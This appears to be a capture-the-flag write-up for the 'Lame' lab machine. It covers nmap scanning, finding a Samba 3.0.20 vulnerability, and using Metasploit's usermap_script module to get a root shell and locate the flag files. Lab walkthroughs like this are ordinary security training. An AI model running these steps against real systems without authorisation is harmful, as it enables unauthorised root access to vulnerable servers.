๐Ÿ‘ฝLame Writeup

[Injection] [CMS Exploit]

Nmap

Nmap was executed with the following flags:

  • -Pn: Treat all hosts as online -- skip host discovery

  • -sC: Performs a script scan using the default set of scripts

  • -sV: Probe open ports to determine service/version info

Let's examine the following port and its running service for vulnerabilities:

Google

https://www.exploit-db.com/exploits/16320arrow-up-right appeared as one of the Google search results using the search term 'Samba smbd 3.0.20'.

Msfconsole

Run the following commands:

  • msfconsole

  • search samba

The module, 'usermap_script', will be used to exploit the vulnerability.

Execute the following to select and use the module:

  • use 8

  • show options

Set the required options:

  • RHOSTS

  • LPORT

  • LHOST

Execute 'run'

Execute 'whoami'

Since we were able to get 'root' privileges, we can use the 'find' command to search for the flags for both the user and root:

The other flag will be in the file 'root.txt':

  • find / -type f -name *.txt | grep root

Last updated